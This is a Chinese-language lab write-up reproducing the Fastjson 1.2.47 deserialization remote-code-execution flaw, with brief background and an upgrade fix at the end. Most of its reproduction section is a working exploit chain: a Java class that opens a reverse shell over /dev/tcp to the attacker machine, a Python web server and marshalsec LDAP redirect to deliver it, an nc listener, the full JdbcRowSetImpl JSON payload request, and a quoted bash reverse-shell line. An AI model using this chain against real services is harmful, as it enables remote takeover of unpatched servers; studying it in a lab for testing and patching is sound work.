Fastjson≤1.2.47 RCE

Fastjson≤1.2.47 RCE

一、漏洞介绍

fastjson 是阿里巴巴的开源JSON解析库，它可以解析 JSON 格式的字符串，支持将 Java Bean 序列化为 JSON 字符串，也可以从 JSON 字符串反序列化到 JavaBean。
首先，Fastjson提供了autotype功能，允许用户在反序列化数据中通过“@type”指定反序列化的类型，其次，Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法，那么当组件开启了autotype功能并且反序列化不可信数据时，攻击者可以构造数据，使目标应用的代码执行流程进入特定类的特定setter或者getter方法中，若指定类的指定方法中有可被恶意利用的逻辑（也就是通常所指的“Gadget”），则会造成一些严重的安全问题。并且在Fastjson 1.2.47及以下版本中，利用其缓存机制可实现对未开启autotype功能的绕过。

影响版本：
Fastjson1.2.47以及之前的版本

二、漏洞危害

远程命令执行。

三、漏洞验证

环境搭建：

实验环境	系统	IP地址
攻击机	win10	192.168.134.130
靶机	Centos7	192.168.134.133

docker pull vulhub/fastjson     #拉取镜像
docker run -d -p 8080:8080 -p 8443:8443 initidc/fastjson1.2.47_rce    #连接容器

验证一下环境是否正常：

漏洞复现

编译生成payload

首先将以下代码保存为Exploit.java（反弹shell命令在代码内，可自行调整）

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Exploit{
    public Exploit() throws Exception {
        Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/192.168.134.130/1888;cat <&5 | while read line; do $line 2>&5 >&5; done"});
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));

        String line;
        while((line = reader.readLine()) != null) {
            System.out.println(line);
        }

        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    }

    public static void main(String[] args) throws Exception {
    }
}

然后编译Exploit.java，会生成一个Exploit.class文件：

javac Exploit.java

攻击机配置

1. 使用python搭建一个临时的web服务（执行命令的目录即为web根目录）：

   python2 -m SimpleHTTPServer  1111
   

   
   
   然后将编译生成的Exploit.class文件放至web目录下，即浏览器访问会下载
   

   此步是为了接收LDAP服务重定向请求，需要在payload的目录下开启此web服务，这样才可以访问到payload文件。

2. 服务器使用marshalsec开启LDAP服务监听：

   java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.134.130:1111/#Exploit 9999
   

   

   使用marshalsec工具快捷的开启LDAP服务，借助LDAP服务将LDAP reference result 重定向到web服务器

3. nc监听

   nc -lvp 1888
   

最后访问fastjson页面，使用Burp抓包，改为POST请求，使用EXP

POST /fastjson/ HTTP/1.1
Host: 192.168.134.133:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 272

{
    "name":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "x":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://192.168.134.130:9999/Exploit",
        "autoCommit":true
    }
 
}

发送后可以看到第三个窗口成功得到shell

注意：

1. 在使用LDAP服务反弹shell用的命令不能直接使用
   bash -i >& /dev/tcp/xx.xx.xx.xx/1888 0>&1
2. jdk版本一定要注意！
   启动服务之前用 java -version查看自己的jdk版本是否低于以下jdk版本
   

四、漏洞修复

将Fastjson升级到最新版本
https://github.com/alibaba/fastjson

参考链接：
https://github.com/CaijiOrz/fastjson-1.2.47-RCE
https://github.com/ianxtianxt/Fastjson-1.2.47-rce